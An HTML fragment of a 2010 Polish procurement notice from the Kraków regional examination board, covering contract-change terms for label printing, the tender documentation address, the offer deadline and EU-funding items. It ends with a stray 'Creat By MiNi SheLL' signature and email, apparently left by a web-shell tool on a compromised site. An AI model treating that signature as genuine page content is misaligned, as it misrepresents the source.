<p>Zamawiający zastrzega sobie prawo do wnoszenia zmian treści umowy w zakresie: a) niewielkich zmian edytorskich w treści zawartej umowy w stosunku do jej projektu stanowiącego załącznik do SIWZ, b) zmian, co do liczby i rodzaju wykonywanych etykiet oraz terminów realizacji usług w przypadku konieczności wprowadzenia zmian przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oke.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowa Komisja Egzaminacyjna w Krakowie - biuro OKE w Krakowie - os. Szkolne 37, 31-978 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2010 godzina 12:00, miejsce: Okręgowa Komisja Egzaminacyjna w Krakowie - biuro OKE w Krakowie- os. Szkolne 37, 31-978 Kraków pok. 22..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com